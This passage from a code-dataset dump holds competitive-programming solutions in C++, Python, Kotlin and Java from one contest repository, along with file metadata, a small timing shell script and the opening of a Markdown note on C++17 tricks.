%d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int 
&b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nint n, m, k;\nint ans = 0;\nvector<pii> trace;\nstruct tri\n{\n int a, b, c;\n tri(){};\n tri(int a, int b, int c)\n {\n this->a = a;\n this->b = b;\n this->c = c;\n }\n};\nqueue<tri> q;\nbool u[51][51];\n\nvoid bfs()\n{\n while (true)\n {\n int i = q.front().a;\n int j = q.front().b;\n int d = q.front().c;\n q.pop();\n if (u[i][j] || i >= n || j >= m)\n continue;\n --k;\n u[i][j] = true;\n ans += d;\n trace.pb({i + 1, j + 1});\n if (!k)\n return;\n\n q.push(tri(i + 1, j, d + 1));\n q.push(tri(i, j + 1, d + 1));\n }\n}\n\nvoid run()\n{\n readln(n, m, k);\n q.push(tri(0, 0, 1));\n bfs();\n cout << ans << endl;\n for(int i = trace.size() - 1; i >= 0; --i)\n {\n auto t = trace[i];\n printf(\"(1,1) \");\n for (int i = 2; i <= t.second; i++)\n printf(\"(%d,%d) \", 1, i);\n for (int i = 2; i <= t.first; i++)\n printf(\"(%d,%d) \", i, t.second);\n enter;\n }\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.2908704876899719, "alphanum_fraction": 0.3205944895744324, "avg_line_length": 28.4375, "blob_id": "cb14474f892f41f62276fb1161b6f9c485e00b41", "content_id": "0ecaa9c7034aa591f0a5218f3e1a2fc8ed3a7aab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 471, "license_type": "no_license", "max_line_length": 216, "num_lines": 16, "path": "/2015/gcjQual/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\nstd::string ans[2] = {\"GABRIEL\", \"RICHARD\"};\n\nint main()\n{\n int t, x, n, 
m;\n std::cin >> t;\n for (int test = 0; test < t; )\n {\n std::cin >> x >> n >> m;\n if (n > m)\n std::swap(n, m);\n std::cout << \"Case #\" << ++test << \": \" << ans[((n * m) % x != 0) || (n < x && m < x) || (x > 6) || x == 5 && (n <= 2 || n == 3 && m == 5) || x == 6 && n <= 3 || x == 3 && n <= 1 || x == 4 && n <= 2] << \"\\n\";\n }\n}\n" }, { "alpha_fraction": 0.3469387888908386, "alphanum_fraction": 0.37755101919174194, "avg_line_length": 12, "blob_id": "d3cf95bc7d1e58f920d2d47f9380690ba97c8919", "content_id": "0410ec0647badbe3687199afb8a22b7c3e38fe3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 17, "num_lines": 7, "path": "/CodeForce/0672/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\r\ns = ''\r\ni = 1\r\nwhile len(s) < n:\r\n s += str(i)\r\n i += 1\r\nprint(s[n - 1])\r\n" }, { "alpha_fraction": 0.47382813692092896, "alphanum_fraction": 0.48515623807907104, "avg_line_length": 27.76404571533203, "blob_id": "5c9dd2cab69aadbc00174bbae00202c5f02598df", "content_id": "07c1fd16aac4713be0c79eada7fd4084e2a53330", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2560, "license_type": "no_license", "max_line_length": 96, "num_lines": 89, "path": "/CodeForce/1298/E.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*\nimport kotlin.math.*\nimport kotlin.collections.*\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun PrintWriter.readSolveWrite() {\n fun writeln(vararg strings: Any) {\n println(strings.map{if (it is IntArray) it.joinToString(\" \") else it}.joinToString(\" \"))\n }\n val (n, k) = getIntArray()\n val score = getIntArray()\n val bad = Array<ArrayList<Int>>(n, {ArrayList<Int>()})\n for (i in 0..k - 1) {\n var (u, v) = getIntArray()\n --u\n --v\n if (score[u] > score[v])\n bad[u].add(v)\n else if (score[v] 
> score[u])\n bad[v].add(u)\n }\n val ans = IntArray(n, {0})\n val b = score.zip(0..n - 1).sortedBy{it.first}\n\n var cnt = 1\n var last = 0\n for (i in 1..n - 1)\n if (b[i - 1].first == b[i].first) {\n ans[b[i].second] = last\n cnt++\n } else {\n ans[b[i].second] = last + cnt\n cnt = 1\n last = ans[b[i].second]\n }\n\n val was = mutableSetOf<Int>()\n for ((_, u) in b) {\n for (v in bad[u])\n if (was.contains(v))\n ans[u]--\n was.add(u)\n }\n writeln(ans)\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\ndata class Pt(val x: Int, val y: Int, val i: Int, var ans: Int)\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.40668347477912903, "alphanum_fraction": 0.4249684810638428, "avg_line_length": 27.836362838745117, "blob_id": "869052669690e8b61a1e22efb447ded327beda2b", "content_id": "9551cc7b58973099630de422abd2e77e2dd82105", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 
1586, "license_type": "no_license", "max_line_length": 98, "num_lines": 55, "path": "/Ann/main2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <vector>\n#include <iostream>\n#include <iomanip>\n#include <future>\n\nusing std::cout;\nusing std::vector;\n\nvoid printArray(vector<vector<double>>& a)\n{\n for (int i = 0; i < a.size(); ++i, cout << \"\\n\")\n for (int j = 0; j < a[0].size(); ++j, cout << \" \")\n cout << std::fixed << std::setw(5) << a[i][j];\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n freopen(\"output.txt\", \"w\", stdout);\n cout.precision(2);\n int w, n;\n std::cin >> w >> n;\n vector<vector<double>> d(n + 1, vector<double>(w + 1, 0)), a(n + 1, vector<double>(w + 1, 0));\n vector<vector<int>> parent(n + 1, vector<int>(w + 1, -1));\n vector<int> ans;\n for (int i = 1; i <= w; ++i)\n for (int j = 1; j <= n; ++j)\n std::cin >> d[j][i];\n //printArray(d);\n\n for (int i = 1; i <= n; ++i)\n for (int c = 0; c <= w; ++c)\n for (int k = 0; k <= c; ++k)\n if (a[i][c] < a[i - 1][c - k] + d[i][k])\n a[i][c] = a[i - 1][c - k] + d[i][k],\n parent[i][c] = k;\n //printArray(a);\n\n std::function<void(int, int)> findans = [&](int k, int s)\n {\n if (k == 0)\n return;\n if (parent[k][s] == -1)\n findans(k - 1, s),\n ans.push_back(0);\n else \n findans(k - 1, s - parent[k][s]),\n ans.push_back(parent[k][s]);\n };\n findans(n, w);\n cout << \"Overall profit is \" << std::fixed << a[n][w] << \"\\n\";\n for (int i = 0; i < n; ++i)\n cout << ans[i] << \" y. 
e goes to \" << (i + 1) << \"-th\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.32565218210220337, "alphanum_fraction": 0.3578260838985443, "avg_line_length": 31.380281448364258, "blob_id": "ba16f43cc2cfcdc2d52a7ff317a158c25c677f5c", "content_id": "d4f4cce8c7a8e4c5742a81d9ff4f30a9f130bab5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2300, "license_type": "no_license", "max_line_length": 118, "num_lines": 71, "path": "/2023/tin/7.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n# python 3.10\nfrom datetime import datetime\n\n\ndef get(x, m, s):\n return [x, m[2], m[3], m[4], m[5] , f\"{m[0]}{m[1] * s if m[1] * s >= 10 else '0' + str(m[1] * s)}:00Z\", f'{s}min']\n\n\n# [h, mod, start, max, min, close]\ndef generate_candles(a) -> str:\n ret = []\n f = {}\n for c in a:\n x, p, d = c.split(',')\n if not x in f:\n f[x] = {\n 'one': [-1] * 6,\n 'two': [-1] * 6,\n 'five': [-1] * 6\n }\n dd = datetime.strptime(d, '%Y-%m-%dT%H:%M:%SZ')\n h = d[:14]\n mod = dd.minute\n\n if f[x]['one'][0] == -1 or f[x]['one'][0] != h or f[x]['one'][1] != mod:\n if f[x]['one'][0] != -1:\n ret.append(get(x, f[x]['one'], 1))\n f[x]['one'] = [h, mod, p, p, p, p]\n else:\n f[x]['one'][3] = max(f[x]['one'][3], p)\n f[x]['one'][4] = min(f[x]['one'][4], p)\n f[x]['one'][5] = p\n\n mod = dd.minute // 2\n if f[x]['two'][0] == -1 or f[x]['two'][0] != h or f[x]['two'][1] != mod:\n if f[x]['two'][0] != -1:\n ret.append(get(x, f[x]['two'], 2))\n f[x]['two'] = [h, mod, p, p, p, p]\n else:\n f[x]['two'][3] = max(f[x]['two'][3], p)\n f[x]['two'][4] = min(f[x]['two'][4], p)\n f[x]['two'][5] = p\n\n mod = dd.minute // 5\n if f[x]['five'][0] == -1 or f[x]['five'][0] != h or f[x]['five'][1] != mod:\n if f[x]['five'][0] != -1:\n ret.append(get(x, f[x]['five'], 5))\n f[x]['five'] = [h, mod, p, p, p, p]\n else:\n f[x]['five'][3] = max(f[x]['five'][3], p)\n f[x]['five'][4] = min(f[x]['five'][4], p)\n f[x]['five'][5] = p\n for x, v 
in f.items():\n if v['one'][0] != -1:\n ret.append(get(x, v['one'], 1))\n if v['two'][0] != -1:\n ret.append(get(x, v['two'], 2))\n if v['five'][0] != -1:\n ret.append(get(x, v['five'], 5))\n \n return '\\n'.join(map(lambda x: ','.join(x), sorted(ret, key=lambda x: [x[0], x[6], x[5]])))\n\nif __name__ == \"__main__\":\n a = []\n while True:\n try:\n input_str = input()\n a.append(input_str)\n except:\n break\n print(generate_candles(a))\n" }, { "alpha_fraction": 0.40807175636291504, "alphanum_fraction": 0.4115595519542694, "avg_line_length": 20.36170196533203, "blob_id": "c3e49cf74b0072b8d7065c5ab1198e3a917c822d", "content_id": "3abd6741c4838b1e804d1a4a80f363e90973701a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2007, "license_type": "no_license", "max_line_length": 63, "num_lines": 94, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.11/K.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\n \npublic class K {\n \n final static String taskName = \"key\";\n \n long min(List<Long> cur) {\n long f = 0, t = 0;\n \n Collections.sort(cur);\n \n for (long l : cur) {\n long nf = l + f;\n long nt = l + t;\n \n if (t + 1 < nf) {\n return t + 1;\n }\n t = nt;\n \n }\n \n return t + 1;\n }\n \n public void solve() {\n int n = in.nextInt(), m = in.nextInt();\n List<Long> cur = new ArrayList<Long>(n + m);\n List<Long> ans = new ArrayList<Long>(m);\n while (--n >= 0) {\n cur.add((long) in.nextInt());\n }\n \n while (--m >= 0) {\n long a = min(cur);\n cur.add(a);\n ans.add(a);\n }\n \n for (long l : ans) {\n out.print(l + \" \");\n }\n \n }\n \n public void run() {\n try {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n \n solve();\n \n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n \n FastScanner in;\n PrintWriter out;\n \n class FastScanner {\n BufferedReader br;\n 
StringTokenizer st;\n \n FastScanner(File f) {\n try {\n br = new BufferedReader(new FileReader(f));\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n \n public static void main(String[] arg) {\n new K().run();\n }\n}" }, { "alpha_fraction": 0.48039647936820984, "alphanum_fraction": 0.4980176091194153, "avg_line_length": 29.469799041748047, "blob_id": "57a58e4a8744f65ab19f8fbaa57f3f9e2ac4737b", "content_id": "97f142d185c681e852c9a5383943978d40aa0d8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4540, "license_type": "no_license", "max_line_length": 174, "num_lines": 149, "path": "/CodeForce/1364/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//cached\ntemplate<class T, class... Args>\nstruct cached\n{\n function<T(Args...)> f;\n map<tuple<Args...>, T> m;\n\n cached(const function<T(Args...)>& f) : f(f) { }\n\n T operator()(Args... args) {\n auto x = tuple(forward<Args>(args)...);\n if (auto it = m.find(x); it != m.end())\n return it->second;\n return m[x] = f(forward<Args>(args)...);\n }\n};\n\n//}}}\n\nvoid run()\n{\n mt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n ints(n);\n auto ask = cached<int, int, int>([&](int i, int j) -> int {\n if (i == j) return 2047;\n writeln(\"?\", i + 1, j + 1);\n cout.flush();\n ints(x);\n return x;\n });\n auto f = [&](int i, int j) {\n return ask(min(i, j), max(i, j));\n };\n auto getAns = [&](int i) {\n vector<int> ans;\n forj(n)\n if (i != j)\n ans.pb(f(i, j));\n else\n ans.pb(0);\n writeln(\"!\", ans);\n exit(0);\n };\n vector<pii> s;\n fori(n) s.emplace_back(12, i);\n int m = n;\n while (s.size() > 2)\n {\n cerr << s.size() << endl;\n vector<pii> t;\n int cur;\n while (true)\n {\n int x = s[rng() % s.size()].second;\n int y = s[rng() % s.size()].second;\n if (x == y)\n continue;\n int temp = ask(x, y);\n if (1 << (2 *__builtin_popcount(temp) - 1) <= s.size())\n {\n cur = x;\n break;\n }\n }\n for (const auto& [_, i]: s)\n t.emplace_back(__builtin_popcount(f(i, cur)), i);\n sort(all(t));\n while (t.rbegin()->first != t.begin()->first)\n t.pop_back();\n t.emplace_back(t[0].first, cur);\n s = move(t);\n }\n if (s.size() == 2)\n {\n while 
(true)\n {\n int X = rng() % n;\n int a = s[0].second;\n int b = s[1].second;\n if (X == a || X == b)\n continue;\n int x = f(X, a);\n int y = f(X, b);\n if (x < y)\n getAns(a);\n if (y < x)\n getAns(b);\n }\n }\n else if (s.size() == 0)\n cerr << \"NOT FOUND\" << endl;\n else\n getAns(s.begin()->second);\n\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5641931891441345, "alphanum_fraction": 0.5747938752174377, "avg_line_length": 18.295454025268555, "blob_id": "b681084f75f664ed40cc765d1e4824e6bff5b4d7", "content_id": "14ec8e070a189f8ddbfc47b2bc7496da41558f5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2547, "license_type": "no_license", "max_line_length": 85, "num_lines": 132, "path": "/CodeForce/0524/B.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\nimport java.math.BigInteger;\nimport java.util.Map.Entry;\n\nimport static java.lang.Math.*;\n\npublic class B extends PrintWriter {\n\n\tvoid run() 
{\n\t\tint n = nextInt();\n\n\t\tlong ans = 10000000L * 10000000L;\n\n\t\tlong[] w = new long[n], h = new long[n];\n\n\t\tfor (int i = 0; i < n; i++) {\n\t\t\tw[i] = nextLong();\n\t\t\th[i] = nextLong();\n\t\t}\n\n\t\tfor (long y = 0; y <= 1001; y++) {\n\t\t\tlong x = 0;\n\t\t\tboolean ok = true;\n\n\t\t\tfor (int i = 0; i < n && ok; i++) {\n\t\t\t\tlong a = min(w[i], h[i]), b = max(w[i], h[i]);\n\t\t\t\tok &= a <= y;\n\t\t\t\tif (b <= y) {\n\t\t\t\t\tx += a;\n\t\t\t\t} else {\n\t\t\t\t\tx += b;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif (ok) {\n\t\t\t\tans = min(x * y, ans);\n\t\t\t}\n\t\t}\n\n\t\tprintln(ans);\n\n\t}\n\n\tvoid skip() {\n\t\twhile (hasNext()) {\n\t\t\tnext();\n\t\t}\n\t}\n\n\tint[][] nextMatrix(int n, int m) {\n\t\tint[][] matrix = new int[n][m];\n\t\tfor (int i = 0; i < n; i++)\n\t\t\tfor (int j = 0; j < m; j++)\n\t\t\t\tmatrix[i][j] = nextInt();\n\t\treturn matrix;\n\t}\n\n\tString next() {\n\t\twhile (!tokenizer.hasMoreTokens())\n\t\t\ttokenizer = new StringTokenizer(nextLine());\n\t\treturn tokenizer.nextToken();\n\t}\n\n\tboolean hasNext() {\n\t\twhile (!tokenizer.hasMoreTokens()) {\n\t\t\tString line = nextLine();\n\t\t\tif (line == null) {\n\t\t\t\treturn false;\n\t\t\t}\n\t\t\ttokenizer = new StringTokenizer(line);\n\t\t}\n\t\treturn true;\n\t}\n\n\tint[] nextArray(int n) {\n\t\tint[] array = new int[n];\n\t\tfor (int i = 0; i < n; i++) {\n\t\t\tarray[i] = nextInt();\n\t\t}\n\t\treturn array;\n\t}\n\n\tint nextInt() {\n\t\treturn Integer.parseInt(next());\n\t}\n\n\tlong nextLong() {\n\t\treturn Long.parseLong(next());\n\t}\n\n\tdouble nextDouble() {\n\t\treturn Double.parseDouble(next());\n\t}\n\n\tString nextLine() {\n\t\ttry {\n\t\t\treturn reader.readLine();\n\t\t} catch (IOException err) {\n\t\t\treturn null;\n\t\t}\n\t}\n\n\tpublic B(OutputStream outputStream) {\n\t\tsuper(outputStream);\n\t}\n\n\tstatic BufferedReader reader;\n\tstatic StringTokenizer tokenizer = new StringTokenizer(\"\");\n\tstatic Random rnd = new Random();\n\tstatic boolean 
OJ;\n\n\tpublic static void main(String[] args) throws IOException {\n\t\tOJ = System.getProperty(\"ONLINE_JUDGE\") != null;\n\t\tB solution = new B(System.out);\n\t\tif (OJ) {\n\t\t\treader = new BufferedReader(new InputStreamReader(System.in));\n\t\t\tsolution.run();\n\t\t} else {\n\t\t\treader = new BufferedReader(new FileReader(new File(B.class.getName() + \".txt\")));\n\t\t\tlong timeout = System.currentTimeMillis();\n\t\t\twhile (solution.hasNext()) {\n\t\t\t\tsolution.run();\n\t\t\t\tsolution.println();\n\t\t\t\tsolution.println(\"----------------------------------\");\n\t\t\t}\n\t\t\tsolution.println(\"time: \" + (System.currentTimeMillis() - timeout));\n\t\t}\n\t\tsolution.close();\n\t\treader.close();\n\t}\n}\n" }, { "alpha_fraction": 0.5136986374855042, "alphanum_fraction": 0.5314446091651917, "avg_line_length": 38.411041259765625, "blob_id": "e1c1da1d96eb296e907fab669567759c4b3b7e22", "content_id": "cffe983b021f7a4922c27450a13e97364c67bfcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6424, "license_type": "no_license", "max_line_length": 178, "num_lines": 163, "path": "/2022/snws3/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//modular\ntemplate<typename T = int, T mod = 998244353>\nstruct modular\n{\n T value;\n\n modular() : value(0) {}\n modular(const modular& other) : value(other.value) {}\n modular operator=(const modular& other) { value = other.value; return *this; }\n template<typename T1> modular operator=(const T1& other) { value = other % mod; if (value < 0) value += mod; return *this; }\n template<typename T1> modular(T1 const& other) { value = other % mod; if (value < 0) value += mod; }\n template<typename T1> modular(T1 const& num, T1 const& den) { *this = modular(den) ^ (mod - 2) * num; }\n template<typename T1> modular& operator^=(T1 const& deg) { modular a(*this); value = T(1); for (T1 n = deg; n > 0; n >>= 1) { if (n & 1) *this *= a; a *= a; } return *this; }\n template<typename T1> modular operator^ (T1 const& deg) const { return modular(*this) ^= deg; }\n inline modular& operator+=(modular const& t) { value += t.value; if (value >= mod) value -= mod; return *this; }\n inline modular& operator-=(modular const& t) { value -= t.value; if (value < 0 ) value += mod; return *this; }\n inline modular& operator*=(modular const& t) { value = (value * 1ll * t.value) % mod; return *this; }\n inline modular& operator/=(modular const& t) { return *this *= ~t; }\n inline modular operator+ (modular const& t) const { return modular(*this) += t; }\n inline modular operator- (modular const& t) const { return modular(*this) -= t; }\n inline modular operator* (modular const& t) const { return modular(*this) *= t; }\n inline modular operator/ (modular const& t) const { return modular(*this) /= t; }\n inline modular operator~ ( ) const { return modular(T(1), value); }\n inline bool operator==(modular const& t) const { return value == t.value; }\n inline bool operator!=(modular const& t) const { return value != t.value; }\n explicit operator T() const { 
return value; }\n\n inline friend ostream& operator<<(ostream& os, modular const& m) { return os << m.value; }\n inline friend istream& operator>>(istream& is, modular& m) { return is >> m.value; m.value %= mod; if (m.value < 0) m.value += mod; }\n};\n\n//}}}\n\nconst int N = 505;\nmodular<> states[N][N];\nbool used[N][N];\n//int new_states[N][N];\n\nvoid run()\n{\n ints(n, m, x, y);\n vector<set<int>> g(n), inv(n);\n fori(m)\n {\n ints(u, v); --u; --v;\n g[u].insert(v);\n g[v].insert(u);\n }\n fori(n)\n forj(n)\n if (i != j && !g[i].contains(j))\n inv[i].insert(j),\n inv[j].insert(i);\n vector<int> color(n, -1);\n vector<vector<int>> sizes;\n fori(n)\n if (color[i] == -1)\n {\n vector<int> counts(2, 0);\n bool ok = true;\n auto setColor = [&](int u, int c) {\n color[u] = c;\n counts[c]++;\n };\n auto two = [&](auto two, int u) -> void {\n for (int v: inv[u])\n if (color[v] == -1)\n setColor(v, 1 - color[u]),\n two(two, v);\n else\n ok &= color[v] != color[u];\n };\n setColor(i, 0);\n two(two, i);\n if (!ok) return writeln(0);\n sizes.pb(counts);\n };\n auto h = [&](int i, int j, const modular<>& ans) {\n states[i][j] += ans;\n used[i][j] = true;\n };\n h(0, 0, 1);\n for (const auto& v: sizes)\n {\n int l = v[0];\n int r = v[1];\n ROF(i, N - 1, 0)\n ROF(j, N - 1, 0)\n if (used[i][j])\n {\n auto& ans = states[i][j];\n h(i + l, j + r, ans);\n h(i + r, j + l, ans);\n if (r == 0)\n h(i + l, j + l, ans);\n ans = 0;\n used[i][j] = false;\n }\n }\n modular ret = 0;\n FOR(i, x, N)\n FOR(j, y, N)\n if (used[i][j])\n ret += states[i][j];\n writeln(ret);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* 
=nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.375, "alphanum_fraction": 0.4749999940395355, "avg_line_length": 39, "blob_id": "0da260cc15b8d5586c24efbae0aaaac0f90debec", "content_id": "8f327fc88239e0eb6fd577b182e8809c2d6fd799", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 40, "license_type": "no_license", "max_line_length": 39, "num_lines": 1, "path": "/scripts/measure.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "echo \"$(time ( $1 ) 2>&1 1>/dev/null )\"\n" }, { "alpha_fraction": 0.5723005533218384, "alphanum_fraction": 0.6018732786178589, "avg_line_length": 21.786571502685547, "blob_id": "7aa99d7ac621154c19ee34e302bfba11b377f2cf", "content_id": "b8a455e5ce019f34bc28b2623b0ad74a25141c48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9502, "license_type": "no_license", "max_line_length": 257, "num_lines": 417, "path": "/CodeForce/cpp17tricks/cpp17.md", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "C++17 is now [available](http://codeforces.com/blog/entry/57646) on codeforces, community [wants](http://codeforces.com/blog/entry/15643?#comment-413401) new edition of [C++ tricks](http://codeforces.com/blog/entry/15643) by [user:Swift], so, let's start! \nDisclaimer: I have done only few examples of new features, which in my opinion are related to competitive programming. 
